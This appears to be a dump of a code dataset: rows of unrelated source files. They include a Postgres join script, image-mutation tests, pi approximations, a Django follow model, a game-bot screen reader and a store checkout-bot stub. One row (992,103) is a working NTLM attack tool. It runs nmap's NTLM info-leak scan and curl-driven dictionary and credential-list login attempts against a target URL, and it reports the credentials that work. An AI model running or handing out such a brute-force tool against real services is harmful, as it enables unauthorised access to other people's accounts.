index int64 0 1,000k | blob_id stringlengths 40 40 | code stringlengths 7 10.4M |
|---|---|---|
992,100 | 1f80f42bd74137e9d599cd33b4955383a332d61f | """
Created on 2/6/2019
@author: Jingchao Yang
Table join for one-to-one match post time and coordinates with tid
"""
from psqlOperations import queryFromDB
import csv
# Postgres DSN -- NOTE(review): credentials are hard-coded; move to env/config.
dbConnect = "dbname='harveyTwitts' user='postgres' host='localhost' password='123456'"
# Left / right tables of the one-to-one join.
tb_join1 = "original_credibility_power"
tb_join2 = "original_gazetteer_power"
def getTids(col):
    """Fetch the requested columns from the credibility table.

    :param col: list of column names to select
    :return: list of row tuples as returned by queryFromDB
    """
    withTids = queryFromDB.get_multiColData(dbConnect, tb_join1, col)
    return withTids
def matchTime(col, tidList):
    """Join one credibility row against tweet times from the gazetteer table.

    :param col: column(s) to select from the gazetteer table, e.g. 'tcreate, tid'
    :param tidList: one row from getTids(); by position: lat, lng,
        road_events, place_events, tids (the tids string is last and is
        spliced into the IN clause)
    :return: list of (lat, lng, 'road,place', time, second-column) tuples
    """
    # NOTE(review): SQL built by string concatenation -- injectable if the
    # tid values are not trusted; parameterize if queryFromDB allows it.
    sql = "select " + col + " from " + tb_join2 + " where tid in (" + tidList[-1] + ")"
    timeList = queryFromDB.freeQuery(dbConnect, sql)
    spaceTime = []
    for t in range(len(timeList)):
        # keep only rows that have coordinates and a non-empty time value
        if tidList[0] is not None and tidList[1] is not None and timeList[t][0] != '':
            spaceTime.append(
                (tidList[0], tidList[1], tidList[2] + ',' + tidList[3], timeList[t][0], str(timeList[t][1])))
    return spaceTime
colList = ['lat', 'lng', 'road_events', 'place_events', 'tids']
tidLists = getTids(colList)

# Write one CSV row per (tid-group, tweet-time) pair, keyed by a running id.
path = 'D:\\harveyTwitter\\power_distribution_old_3.csv'
with open(path, "w", newline='', encoding="utf-8") as csv_file:
    writer = csv.writer(csv_file)
    row_id = 0  # renamed from `id`, which shadowed the builtin
    for tid_row in tidLists:
        result = matchTime('tcreate, tid', tid_row)
        for line in result:
            print((row_id,) + line)
            writer.writerow((row_id,) + line)
        row_id += 1
    # no explicit close(): the with-statement already closes the file
    # (the original called csv_file.close() redundantly inside the block)
|
992,101 | 7ae42fc565ce68cf27db143413a7878536d75903 | /Users/jieqianzhang/anaconda3/lib/python2.7/sre_parse.py |
992,102 | 47a0d37834e16553b6590e01b94e3580228bda8f | #!/usr/bin/env python
import numpy as np
import matplotlib.pyplot as pyplot
import imag_manip_gen3 as g
import fitness_ext as f
IMG_SHAPE = (240, 300, 3)  # (height, width, RGB channels) of the working image
indfactory = g.IndividualFactory(120)  # factory for individuals -- presumably 120 rectangles each; TODO confirm
def draw_in_grid(img, shape, row, col):
    """Render img into cell (row, col) of a shape=(rows, cols) subplot grid."""
    cell_index = shape[1] * row + col + 1  # subplot indices are 1-based, row-major
    pyplot.subplot(shape[0], shape[1], cell_index)
    pyplot.axis("off")
    pyplot.imshow(img.copy().astype('uint8'))
def test_mutate():
    """Visual smoke test: one grid row per mutator, the original in cell (0,0).

    Python 2 code (uses xrange); relies on project modules g and f.
    """
    mutators = [g.mutate_shape, g.mutate_color, g.mutate_reorder,
                g.mutate_position, g.mutate_noise]
    shape = (len(mutators) + 1, 4)  # rows: original + one per mutator; 4 samples each
    ind = indfactory.build()
    decoded = np.empty(IMG_SHAPE, dtype = np.int)
    f.decode_rectangles(ind.data, decoded)
    orig_decoded = decoded.copy()  # NOTE(review): kept but never used afterwards
    draw_in_grid(decoded, shape, 0, 0)
    for row in xrange(1, shape[0]):
        for col in xrange(shape[1]):
            mutated = mutators[row - 1](ind)
            # mutated = g.mutate(ind)
            f.decode_rectangles(mutated.data, decoded)
            draw_in_grid(decoded, shape, row, col)
def test_xover():
    """Visual smoke test: parents in row 0, ten children per crossover row.

    Python 2 code (uses xrange); relies on project modules g and f.
    """
    xovers = [g.crossover_unif, g.crossover_arith]
    pa = indfactory.build()
    ma = indfactory.build()
    decoded = np.empty(IMG_SHAPE, dtype = np.int)
    shape = (len(xovers) + 1, 10)  # rows: parents + one per crossover operator
    f.decode_rectangles(pa.data, decoded)
    draw_in_grid(decoded, shape, 0, 0)
    f.decode_rectangles(ma.data, decoded)
    draw_in_grid(decoded, shape, 0, 1)
    for row in xrange(1, shape[0]):
        for col in xrange(shape[1]):
            kid = xovers[row - 1](pa, ma)
            f.decode_rectangles(kid.data, decoded)
            draw_in_grid(decoded, shape, row, col)
# Entry point: show the crossover demo (mutation demo kept disabled).
# test_mutate()
test_xover()
pyplot.show()
|
992,103 | c3bd013e280943adfbd919904aa574139d38974d | #!/usr/bin/python3
# Simple wrapper for some command line NTLM attacks
import argparse
import sys
import os.path
import subprocess
from urllib.parse import urlparse
import re
import time
import signal
def test_login( username, password, url, http1_1 = False ):
    """Attempt one NTLM login via curl; return True on any non-401 response.

    On success the pair is appended to the global `found`/`foundusers`
    lists; honours the global `args` flags quitonsuccess and delay.
    """
    global args, found, foundusers
    username = username.strip()
    password = password.strip()
    # Skip this attempt if we already have credentials for this user
    if username in foundusers:
        return False
    print("[*] Testing " + username + " : " + password)
    try:
        cmd = ["curl", "-s", "-I", "--ntlm", "--user", username + ":" + password, "-k"]
        if http1_1:
            cmd.append( '--http1.1' )
        cmd.append(url)
        out = subprocess.check_output( cmd ).decode('utf8')
        # FIX: raw string with an escaped dot -- the original "HTTP\/\d.\d"
        # let the dot match any character and escaped "/" needlessly.
        m = re.findall( r"HTTP/\d\.\d (\d{3})", out )
        for code in m:
            if code != "401":
                print("[+] FOUND: " + username + " : " + password)
                found.append( username + " : " + password )
                foundusers.append( username )
                if args.quitonsuccess:
                    sys.exit(0)
                if args.delay:
                    time.sleep(args.delay)
                return True
        if args.delay:
            time.sleep(args.delay)
    except SystemExit:
        raise
    except (subprocess.CalledProcessError, OSError):
        # narrowed from a bare except that also hid programming errors
        print('ERROR: curl call failed')
    return False
def show_found():
    """Print every credential pair collected so far, or a consolation message."""
    if found:
        print("Found:\n - " + "\n - ".join(found))
    else:
        print("No creds found :(")
def cancel_handler(signal=None, frame=None):
    """SIGINT handler: dump whatever credentials were found, then exit 0."""
    print("Caught ctrl-c, quitting...")
    show_found()
    sys.exit(0)
# Dump collected credentials on Ctrl-C instead of dying mid-run.
signal.signal(signal.SIGINT, cancel_handler)
parser = argparse.ArgumentParser(description="Wrapper for NTLM info leak and NTLM dictionary attack")
parser.add_argument("-c", "--credslist", help="File with list of credentials in <username>:<password> format to use")
parser.add_argument("-u", "--user", help="Username to dictionary attack as")
parser.add_argument("-U", "--userlist", help="Username list to dictionary attack as")
parser.add_argument("-p", "--password", help="Password to dictionary attack as")
parser.add_argument("-d", "--domain", help="NTLM domain name to attack")
parser.add_argument("-P", "--passlist", help="Password list to dictionary attack as")
parser.add_argument("-D", "--delay", help="Delay between each attempt, in seconds")
parser.add_argument("-i", "--info", action="store_true", help="Exploit NTLM info leak")
parser.add_argument("-s", "--same", action="store_true", help="Try password=username")
parser.add_argument("-b", "--blank", action="store_true", help="Try blank password")
parser.add_argument("-1", "--quitonsuccess", action="store_true", help="Stop as soon as the first credential is found")
parser.add_argument("--http1_1", action="store_true", help="Force use of HTTP 1.1 (if you're getting \"curl call failed\" errors due to HTTP2)")
parser.add_argument("url", help="URL of NTLM protected resource, e.g. https://webmail.company.com/ews/exchange.asmx")
args = parser.parse_args()
# NOTE(review): `url` is a required positional, so argparse already exits
# when it is missing -- this guard is effectively dead code.
if not args.url:
    parser.print_usage()
    sys.exit(2)
print()
if args.delay:
    args.delay = int(args.delay)
# Derive the port (used only by the nmap info-leak scan below).
url = urlparse(args.url)
if not url.port:
    if url.scheme == 'https':
        port = 443
    else:
        port = 80
else:
    port = url.port
found = []       # "user : pass" strings for every successful login
foundusers = []  # usernames already cracked; skipped on later attempts
print('Running against ' + url.geturl())
if args.info:
    # Run the nmap NTLM info-leak NSE script against the target
    cmd = "nmap -p" + str(port) + " --script http-ntlm-info --script-args http-ntlm-info.root="+url.path+" "+url.netloc
    print(cmd)
    os.system( cmd )
# Dictionary attack needs (a user source AND a password source) or a creds file.
if (( args.user or args.userlist ) and ( args.password or args.passlist )) or args.credslist:
    # Check user list exists
    if args.userlist and not os.path.isfile(args.userlist):
        print('Couldn\'t find ' + args.userlist)
        parser.print_usage()
        sys.exit(2)
    # Check password list exists
    if args.passlist and not os.path.isfile(args.passlist):
        print('Couldn\'t find ' + args.passlist)
        parser.print_usage()
        sys.exit(2)
    # Check creds list exists
    if args.credslist and not os.path.isfile(args.credslist):
        print('Couldn\'t find ' + args.credslist)
        parser.print_usage()
        sys.exit(2)
    if args.passlist:
        print("Password list")
        fp = open( args.passlist, "r" )
        if args.user:
            # Blank/same variants for the single user, tried once up front
            if args.same:
                test_login( args.user, args.user, url.geturl(), args.http1_1 )
            if args.blank:
                test_login( args.user, '', url.geturl(), args.http1_1 )
        elif args.userlist:
            fu = open( args.userlist, "r" )
            for u in fu:
                # Loop over blank / same for when multiple passes and users
                if args.same:
                    test_login( u, u, url.geturl(), args.http1_1 )
                if args.blank:
                    test_login( u, '', url.geturl(), args.http1_1 )
            fu.close()
        for p in fp:
            if args.userlist:
                # many users, many passwords: re-open the user list per password
                fu = open( args.userlist, "r" )
                for u in fu:
                    test_login( u, p, url.geturl(), args.http1_1 )
                fu.close()
            else:
                # One user, many passwords
                test_login( args.user, p, url.geturl(), args.http1_1 )
        fp.close()
    elif args.userlist:
        print("User list")
        fu = open( args.userlist, "r" )
        for u in fu:
            # Many users, one password
            test_login( u, args.password, url.geturl(), args.http1_1 )
            if args.same:
                test_login( u, u, url.geturl(), args.http1_1 )
            if args.blank:
                test_login( u, '', url.geturl(), args.http1_1 )
        fu.close()
    elif args.credslist:
        print('Creds list')
        # NOTE(review): this handle is never closed, unlike the other branches
        fp = open( args.credslist, "r" )
        for line in fp:
            line = line.strip()
            if line == '':
                continue
            creds = line.split(':')
            if len( creds ) < 2:
                print('No username / pass combination in: ' + line)
                continue
            # Passwords may themselves contain ':' -- rejoin everything after the first
            test_login(creds[0], ':'.join(creds[1:]), url.geturl(), args.http1_1)
    else:
        # One user, one password
        print("Single user / password")
        if args.blank:
            test_login( args.user, '', url.geturl(), args.http1_1 )
        if args.same:
            test_login( args.user, args.user, url.geturl(), args.http1_1 )
        test_login( args.user, args.password, url.geturl(), args.http1_1 )
show_found()
print("Done")
|
992,104 | e59daaf3a88854a7d38453d7db64453214b93e99 | import pytesseract
import numpy as np
from . import ImageAnalyser as ia
import logging, importlib
from .settings.Point import Point
from .settings.Rectangle import Rectangle
logger = logging.getLogger("ZombidleBotLogger")
# Count of consecutive frames whose OCR contained the "Area" label;
# used by usePortal() to debounce portal navigation.
timesReadArea = 0
def reloadModules():
    """Hot-reload the ImageAnalyser module (development convenience)."""
    importlib.reload(ia)
def checkShard(img, settings):
    """Return the click position to enter the shard menu, or None.

    None means either a shard is already on the craft tile (OCR contains
    "SHARD") or the menu entry is absent / not highlighted.
    """
    read = ia.readCharacters(img, settings.shardTileBox)
    logger.debug("read shard tile : " + read)
    if "SHARD" in read:
        # a shard already occupies the craft tile -- nothing to do
        return None
    read = ia.readCharacters(img, settings.shardEnterBox)
    logger.debug("read shard menu entry : " + read)
    if "SHARDS" in read:
        logger.debug("arcane img enter shard : " + str(img[settings.shardEnterRedPos.height, settings.shardEnterRedPos.width]))
        # pixel > 55 appears to mean the entry is highlighted/clickable -- TODO confirm
        if img[settings.shardEnterRedPos.height, settings.shardEnterRedPos.width] > 55:
            logger.info("Arcane -- enter shard menu")
            return settings.shardEnterRedPos
    # FIX: collapsed the original's redundant `else: return None` branches
    # and removed the unreachable trailing `return None`.
    return None
def processArcane(img, settings):
    """Decide the next click inside the arcane crafting screen.

    Returns a click position, or None to wait. Decisions are driven by
    single-pixel probes (values 61 = active, 31 = inactive -- TODO confirm)
    and OCR of the shard note/craft boxes.

    NOTE(review): indentation was reconstructed from a flattened dump --
    verify the nesting of the pr/pg/pc/pb chain against the original file.
    """
    # Pixel probes for the four arcane buttons.
    pr = img[settings.repeatLastCraftPos.height, settings.repeatLastCraftPos.width]
    pg = img[settings.fastGhostCraftPos.height, settings.fastGhostCraftPos.width]
    pc = img[settings.collectAllPos.height, settings.collectAllPos.width]
    pb = img[settings.nextBoostPos.height, settings.nextBoostPos.width]
    logger.debug("arcane img repeat : " + str(pr))
    logger.debug("arcane img ghost : " + str(pg))
    logger.debug("arcane img collect : " + str(pc))
    logger.debug("arcane img boost : " + str(pb))
    read = ia.readCharacters(img, settings.shardNoteBox)
    if "build one shard" in read:
        logger.debug("read shard note : " + read)
        read = ia.readCharacters(img, settings.shardCraftBox)
        if "RAF" in read:
            # Craft button ("CRAFT") visible: craft the splinter/shard now.
            logger.debug("read shard box : " + read)
            logger.info("Arcane -- craft splinter or shard")
            return settings.shardCraftBox.getCenterPoint()
        else:
            # Otherwise prefer shard-menu entry, then the regular craft actions.
            if pr == 61:
                r = checkShard(img, settings)
                if r != None:
                    return r
                else:
                    logger.info("Arcane -- repeat last craft")
                    return settings.repeatLastCraftPos
            if pg == 61:
                r = checkShard(img, settings)
                if r != None:
                    return r
                else:
                    logger.info("Arcane -- fast ghost craft")
                    return settings.fastGhostCraftPos
            if pc == 61:
                logger.info("Arcane -- collect all")
                return settings.collectAllPos
            if pb == 61:
                logger.info("Arcane -- craft boost")
                return settings.nextBoostPos
            if pr == 31 and pg == 31 and pc == 31 and pb == 31:
                # Every button inactive: leave the arcane screen.
                logger.info("Arcane -- quit")
                return settings.arcaneQuitPos
    logger.info("Arcane -- wait")
    return None
def findPos(read1, read2, read3, ids, settings):
    """Return the reward-slot position whose OCR text contains every token in ids.

    Slots are checked left to right; None when no slot matches.
    """
    slots = (
        (read1, settings.reward1Pos),
        (read2, settings.reward2Pos),
        (read3, settings.reward3Pos),
    )
    for text, pos in slots:
        if all(token in text for token in ids):
            return pos
    return None
def processReward(img, settings):
    """OCR the three chest-reward slots and pick the best-known item.

    Items are tried in a fixed priority order (most valuable first); the
    first slot whose text contains all of an item's OCR tokens wins.
    Falls back to the left-most slot when nothing is recognised.
    """
    read1 = ia.readCharacters(img, settings.reward1Box)
    logger.debug("read reward1 : " + read1)
    read2 = ia.readCharacters(img, settings.reward2Box)
    logger.debug("read reward2 : " + read2)
    read3 = ia.readCharacters(img, settings.reward3Box)
    logger.debug("read reward3 : " + read3)
    # (OCR tokens, item name) in descending priority -- order matters.
    # Tokens are deliberately partial to survive OCR noise.
    priorities = [
        (["Chalice"], "Death Chalice"),
        (["cro Sw"], "Necro Sword"),
        (["abl"], "Stone Tablet"),
        (["Ring"], "Magic Ring"),
        (["ower"], "Power Potion"),
        (["ow", "x"], "Power Axe"),
        (["Collar"], "King's Collar"),
        (["Bear"], "Squid's Teddy Bear"),
        (["BC's"], "Lich's ABC's"),
        (["lagu"], "Plague in a Bottle"),
        (["ancy"], "Bat's Fancy Pin"),
        (["hys"], "Specter's Amethyst"),
        (["Knight"], "Red Knight's Lipstick"),
        (["Gian"], "Giant Zombie's Mace"),
        (["Zombie"], "Zombie Horde's Eye"),
    ]
    # Replaces the original's fifteen copy-pasted findPos/if blocks.
    for ids, name in priorities:
        p = findPos(read1, read2, read3, ids, settings)
        if p != None:
            logger.info("Chest Reward -- " + name)
            return p
    logger.info("Chest Reward -- Left Item")
    return settings.reward1Pos
def usePortal(img, settings):
    """Navigate toward and trigger the time portal.

    Return protocol (as used by determineAction): None = no portal action,
    (0, ) = handled without a click, (1, pos) = click pos.
    """
    global timesReadArea
    read = ia.readCharacters(img, settings.errorBox)
    logger.debug("read ask box : " + read)
    if "Warp" in read:
        logger.info("Use Portal -- Accept warp")
        return (1, settings.yesPos)
    if "Reset your game" in read:
        logger.info("Use Portal -- Accept reset")
        return (1, settings.yesPos)
    read = ia.readCharacters(img, settings.resetGameBox)
    logger.debug("read reset game box : " + read)
    if "medals, Items and Hell" in read:
        logger.info("Use Portal -- Use Time Portal")
        return (1, settings.useTimePortalPos)
    # Debounce: only act after the "Area" label was seen 3 frames in a row.
    if timesReadArea < 3:
        return None
    p = img[settings.rigthPanelBarPos.height, settings.rigthPanelBarPos.width]
    logger.debug("img rigth Panel Bar : " + str(p))
    # Pixel 187: portal page of the right panel visible -- TODO confirm
    if p == 187:
        p2 = img[settings.quickPortalPos.height, settings.quickPortalPos.width]
        logger.debug("img quick portal : " + str(p2))
        if p2 == 79:
            logger.info("Use Portal -- Quick Portal")
            return (1, settings.quickPortalPos)
        else:
            logger.info("Use Portal -- Reset Read Area Timer")
            timesReadArea = 0
            return (0, )
    # Pixel 17: panel not on the portal page yet; scroll right -- TODO confirm
    if p == 17:
        logger.info("Use Portal -- click Rigth Panel Rigth Arrow")
        return (1, settings.rigthPanelRigthArrowPos)
    return None
def findRigthPanelCursorPos(img, settings):
    """Locate the scroll cursor in the right-panel bar (colour range 211-220 -- TODO confirm)."""
    return ia.findCenterSameColorHor(img, settings.rigthPanelBarBox, 5, 211, 220)

def findMinionTilesPos(img, settings):
    """Locate minion tile runs in the right panel (colour range 19-25 -- TODO confirm)."""
    return ia.findCenterSameColorHor(img, settings.rigthPanelMinionBox, 5, 19, 25)
def levelUpMinions(img, settings):
    """Build a click list to buy / level up minions on the right panel.

    Returns None (nothing to do) or a list whose first element is an
    action code (1 = perform the following clicks) followed by click
    positions.

    NOTE(review): indentation was reconstructed from a flattened dump --
    verify nesting (especially the tail of the for-loop) against the
    original file.
    """
    pm = img[settings.minionTabPos.height, settings.minionTabPos.width]
    logger.debug("img minion tab : " + str(pm))
    # Bail out unless the right-panel cursor is detectable.
    if len(findRigthPanelCursorPos(img, settings)) != 2:
        return None
    # Pixel 29 marks the minion tab as selected -- TODO confirm.
    if pm != 29:
        return (1, settings.minionTabPos)
    r = [2]  # action code placeholder; set to 1 whenever clicks are queued
    l = findMinionTilesPos(img, settings)  # flat list of (position, width) pairs
    king = False  # saw the Tomb King tile this pass
    carl = False  # saw the CARL tile this pass
    read = ia.readCharacters(img, settings.multipleBuyBox)
    logger.debug("read multiple buy box : " + read)
    if "MAX" not in read:
        # Switch the buy multiplier to MAX before doing anything else.
        r.append(settings.multipleBuyBox.getCenterPoint())
        logger.debug("append multiple buy")
        r[0] = 1
        return r
    for i in range(0, len(l), 2):
        p = l[i]
        # Fully visible tile: read its name and probe the level-up button.
        if p.width >= settings.rigthPanelMinionBox.topleft.width - 2 and l[i+1] >= settings.minionTileWidth - settings.minionPortraitWidth:
            box = Rectangle.fromValues(p.width + l[i+1] - settings.minionTileWidth + settings.minionPortraitWidth, settings.minionNameBot, p.width + l[i+1], settings.minionNameTop)
            readname = ia.readCharacters(img, box)
            logger.debug("read minion name box 1 : " + readname)
            if "Tomb" in readname:
                king = True
            if "CARL" in readname:
                carl = True
            box = Rectangle.fromValues(p.width + 10, settings.levelUpBot, p.width + settings.levelUpWidth, settings.levelUpTop)
            point = box.getCenterPoint()
            pixel = img[settings.levelUpRedHeight, int(point.width)]
            logger.debug("pos level up 1 : " + str(point.width) + " " + str(settings.levelUpRedHeight))
            logger.debug("img level up 1 : " + str(pixel))
            if pixel == 29:
                continue  # button disabled (cannot afford) -- TODO confirm
            if pixel == 53 or pixel == 25:
                r.append(point)  # level-up button active
            else:
                r.append(Point(p.width + l[i+1] / 2, settings.buyHeight))  # not owned: buy
            continue
        # Partially visible tile at the right edge.
        if p.width + l[i+1] >= settings.rigthPanelMinionBox.botrigth.width - 2 and l[i+1] >= settings.levelUpWidth:
            box = Rectangle.fromValues(p.width + 10, settings.levelUpBot, p.width + settings.levelUpWidth, settings.levelUpTop)
            read = ia.readCharacters(img, box)
            logger.debug("read level up box 3 : " + read)
            continue
            # NOTE(review): the four lines below are unreachable after the
            # `continue` above -- this looks like a latent bug in the original.
            if "LEVEL" in read:
                r.append(box.getCenterPoint())
            else:
                r.append(Point(p.width + l[i+1] / 2, settings.buyHeight))
    # Default navigation: scroll the panel right to reach further minions.
    r.append(settings.rigthPanelRigthArrowPos)
    r[0] = 1
    logger.debug("carl " + str(carl))
    logger.debug("king " + str(king))
    # Steer toward the CARL .. Tomb King range when it is not fully in view.
    if carl != True or king != True:
        r[0] = 1
        if carl == True:
            r.append(settings.rigthPanelLeftArrowPos)
            logger.debug("append left")
        if king == True:
            r.append(settings.rigthPanelRigthArrowPos)
            logger.debug("append right")
        if carl != True and king != True:
            r.append(settings.rigthPanelRigthArrowPos)
            logger.debug("append right")
            r[0] = 1
    if len(r) > 1:
        return r
    else:
        return None
def determineAction(img, settings, mode = 0):
    """Main per-frame decision function of the bot.

    Returns a tuple: (0, ) = do nothing this frame, (1, pos) = click pos,
    (4, ) = free to grind-click (HP bar visible). `mode` gates optional
    behaviours: 1 = level minions, 2 = use portals, 3 = both.
    """
    logger.debug("mode : " + str(mode))
    global timesReadArea
    logger.info("Action -- Start")
    # Right panel collapsed? (template match on the expand-cross)
    if np.array_equal(img[settings.extendRPanelCrossBox.getSliceNP()], settings.extendRPanelCrossIMG):
        logger.info("Action -- open right panel")
        return (1, settings.extendRPanelCrossBox.getCenterPoint())
    # Track consecutive frames showing the "Area" label (portal debounce).
    read = ia.readCharacters(img, settings.areaBox)
    logger.debug("read area box : " + read)
    if "Area" in read:
        timesReadArea += 1
    else:
        timesReadArea = 0
    logger.debug("timesReadArea : " + str(timesReadArea))
    # "THE DEAL" popup: classify the offer text and accept/decline.
    read = ia.readCharacters(img, settings.dealBox)
    if read == "THE DEAL":
        logger.info("Action -- deal")
        read = ia.readCharacters(img, settings.dealContentBox)
        logger.debug("read deal : " + read)
        if len(read) < 40:
            # OCR too short to classify safely -- wait for a cleaner frame.
            logger.info("Deal -- message too short")
            return (0, )
        if "ull" in read or "minutes" in read:
            logger.info("Deal -- Skull x")
            return (1, settings.dealNoPos)
        if "chest" in read:
            logger.info("Deal -- Chest")
            return (1, settings.dealNoPos)
        if "amage" in read or ("sec" in read and "nds" in read):
            logger.info("Deal -- Damage x")
            return (1, settings.dealNoPos)
        if "craft" in read or "time" in read:
            logger.info("Deal -- Skip Craft Time")
            if "free" in read:
                return (1, settings.dealAwsomePos)
            else:
                return (1, settings.dealYesPos)
        if "x" in read:
            logger.info("Deal -- Diamonds")
            if "free" in read:
                return (1, settings.dealAwsomePos)
            else:
                return (1, settings.dealYesPos)
        logger.info("Deal -- ??")
        return (1, settings.dealNoPos)
    # Same popup, shifted after a "try again" -- always accepted.
    read = ia.readCharacters(img, settings.dealBox.offset(settings.dealTryAgainOffset))
    if read == "THE DEAL":
        logger.info("Action -- deal (after try again)")
        read = ia.readCharacters(img, settings.dealContentBox.offset(settings.dealTryAgainOffset))
        logger.debug("read deal : " + read)
        return (1, settings.dealYesPos.add(settings.dealTryAgainOffset))
    read = ia.readCharacters(img, settings.dealThanksBox)
    if read == "Thanks!":
        logger.info("Action -- thanks")
        return (1, settings.dealExitPubPos)
    # Inside the arcane screen? Delegate to processArcane.
    res = ia.findTemplateInImage(img, settings.ArcaneIMG)
    if settings.arcaneIMGBox.contains(res):
        logger.info("Action -- in arcane")
        arcanePos = processArcane(img, settings)
        if arcanePos == None:
            return (0, )
        else:
            return (1, arcanePos)
    # Arcane timer READY: navigate to the arcane screen.
    read = ia.readCharacters(img, settings.arcaneTimerBox)
    if "READY" in read:
        logger.debug("read timer : " + read)
        res = ia.findTemplateInImage(img, settings.GoToArcaneButtonIMG)
        if settings.goToArcaneBox.contains(res):
            logger.info("Action -- click arcane button")
            return (1, settings.goToArcanePos)
        else:
            logger.info("Action -- click item tab")
            return (1, settings.itemTabPos)
    # Clickable notifications (scroll drop, chest collector).
    res = ia.findTemplateInImage(img, settings.ScrollIMG)
    if settings.notifBox.contains(res):
        logger.info("Action -- click Scroll")
        return (1, res.getCenterPoint())
    res = ia.findTemplateInImage(img, settings.ChestCollectorIMG)
    if settings.notifBox.contains(res):
        logger.info("Action -- click ChestCollector")
        return (1, res.getCenterPoint())
    # Chest reward choice screen.
    read = ia.readCharacters(img, settings.rewardBox)
    logger.debug("read reward box : " + read)
    if "REWARD" in read or "Things" in read:
        logger.info("Action -- Choose Chest Reward")
        rewardPos = processReward(img, settings)
        return (1, rewardPos)
    if mode == 2 or mode == 3:
        r = usePortal(img, settings)
        if r != None:
            return r
    # Misc dismissable popups.
    read = ia.readCharacters(img, settings.gotDeathCoinBox)
    if "You got this!" in read:
        logger.info("Action -- Get Death Coins")
        return (1, settings.okPos)
    read = ia.readCharacters(img, settings.dealNothingHappensBox)
    if "smash that button" in read:
        logger.info("Action -- Nothing Happens")
        return (1, settings.dealNothingHappensPos)
    read = ia.readCharacters(img, settings.errorBox)
    if "Error" in read:
        logger.info("Action -- Error")
        return (1, settings.okPos)
    if mode == 1 or mode == 3:
        logger.debug("level up minions")
        r = levelUpMinions(img, settings)
        if r != None:
            return r
    # HP bar visible means no popup obstructs the play field.
    read = ia.readCharacters(img, settings.HPBox)
    logger.debug("read HP box : " + read)
    if "HP" in read:
        logger.info("Action -- Can click")
        return (4, )
    logger.info("Action -- nothing")
    return (0, )
|
992,105 | 068245f83279975e17d709f532374d4a91cf065a | from django.db import models
from django.conf import settings
# Create your models here.
from django.db.models.signals import post_save
from tweets.models import Tweet
class UserProfileManager(models.Manager):
    """Manager for UserProfile adding follow/unfollow helpers.

    NOTE: `use_for_related_fields` is ignored by Django >= 2.0; kept for
    compatibility with older versions.
    """
    use_for_related_fields = True

    def all(self):
        """All profiles, excluding the related instance itself when this is
        used as a related manager (a user should not be suggested to
        follow themself)."""
        qs = self.get_queryset().all()
        # FIX: `self.instance` only exists on related managers; the original
        # used a bare `except: pass` that also swallowed unrelated errors.
        instance = getattr(self, 'instance', None)
        if instance:
            qs = qs.exclude(user=instance)
        return qs

    def toggle_follow(self, user, to_toggle_user):
        """Follow/unfollow `to_toggle_user` on behalf of `user`.

        Returns True if `user` is following after the call, else False.
        """
        user_profile, created = UserProfile.objects.get_or_create(user=user)
        if to_toggle_user in user_profile.following.all():
            user_profile.following.remove(to_toggle_user)
            is_followed = False
        else:
            user_profile.following.add(to_toggle_user)
            is_followed = True
        return is_followed

    def is_following(self, user, followed_by_user):
        """True iff `user` already follows `followed_by_user`."""
        user_profile, created = UserProfile.objects.get_or_create(user=user)
        if created:
            # freshly created profile cannot be following anyone yet
            return False
        return followed_by_user in user_profile.following.all()
class UserProfile(models.Model):
    """Per-user profile holding the asymmetric follow graph."""
    # One profile per auth user; reachable as user.profile (related_name)
    user = models.OneToOneField(settings.AUTH_USER_MODEL, related_name='profile', on_delete=models.CASCADE)
    # Users this profile follows; reverse accessor is user.followed_by
    following = models.ManyToManyField(settings.AUTH_USER_MODEL, blank=True, related_name="followed_by")
    objects = UserProfileManager()

    def __str__(self):
        #return str(self.following.all().count())
        return str(self.user)

    def get_following(self):
        """Everyone this user follows, never including the user themself."""
        users = self.following.all()  # Users.objects.all() filtered to follows
        return users.exclude(username=self.user.username)
def post_save_user_receiver(sender, instance, created, *args, **kwargs):
    """post_save hook: create a matching UserProfile for each new user."""
    if created:
        # get_or_create guards against duplicates if the signal replays
        new_profile = UserProfile.objects.get_or_create(user=instance)
        # celery + redis
        # do some email task after user sign up

# post_save.connect(post_save_user_receiver, sender=Model)
# when a new user is created it will also be added in UserProfile
post_save.connect(post_save_user_receiver, sender=settings.AUTH_USER_MODEL)
|
992,106 | f4e6a9f1e7cb328613ddaaac0674bbe11f4cdc46 | import numpy
from math import log2, sqrt
from scipy.linalg import solve
from decimal import Decimal
def pi(k):
    """Approximate pi by Archimedes' side-doubling of an inscribed polygon.

    Starts from a square and doubles the side count until the polygon has
    k sides (k must be a power of two >= 4). Decimal keeps the interim
    square roots precise; the result is returned as a float.
    """
    side = Decimal(2) ** Decimal(0.5)  # side of the inscribed square
    doublings = int(log2(k / 4))
    for _ in range(doublings):
        half = side / 2
        # chord of the halved arc, from the Pythagorean side-doubling identity
        side = (half ** 2 + (1 - (1 - half ** 2).sqrt()) ** 2).sqrt()
    # semi-perimeter of the k-gon inscribed in the unit circle
    return float(k * side / 2)
def pi1(k):
    """Approximate pi with a circumscribed-polygon recurrence in float math.

    Starts from a square (k = 4 returns exactly 4) and refines
    int(log2(k/4)) times; k must be a power of two >= 4.
    """
    t = 1
    steps = int(log2(k / 4))
    for _ in range(steps):
        t = numpy.sqrt(1 - 2 / (numpy.sqrt(t ** 2 + 1) + 1))
    return k * t
def test():
    """Fit a cubic in 1/k through pi(k), pi(2k), pi(4k), pi(8k) for k = 2**n,
    n = 2..9, and return the eight coefficient vectors.

    The constant term of each fit extrapolates the polygon perimeter to
    k -> infinity, i.e. approximates pi (Richardson-style extrapolation).
    """
    solutions = []
    for n in range(2, 10):
        k = 2 ** n
        ks = [k, 2 * k, 4 * k, 8 * k]
        # Vandermonde-like system in powers of 1/k
        A = numpy.array([[1, 1 / m, 1 / m ** 2, 1 / m ** 3] for m in ks])
        B = numpy.array([pi(m) for m in ks])
        solutions.append(solve(A, B))
    return solutions
|
992,107 | d72a4ffee20cb96880166e88a5be550a37eebc2c | import time
import sys
import requests
from bs4 import BeautifulSoup
from splinter import Browser
# Shop endpoints.
mainUrl = "http://www.supremenewyork.com/shop/all"
baseUrl = "http://supremenewyork.com"
#productUrl = "http://www.supremenewyork.com/shop/t-shirts/morrissey-tee/white"
checkoutUrl = "https://www.supremenewyork.com/checkout"
# product info - input keyword as first argument
product = sys.argv[1]
selectOption = "Medium" # change this to the size you want
# billing/shipping info (placeholders -- fill in before use)
namefield = "Name Name"
emailfield = "email@email.com"
phonefield = "0000000000"
addressfield = "00000 Zero Street"
zipfield = "00000"
statefield = "CA"
cctypefield = "master" # "master" "visa" "american_express"
ccnumfield = "000000000000" # this is random, not my info lol
ccmonthfield = "00"
ccyearfield = "0000"
cccvcfield = "000"
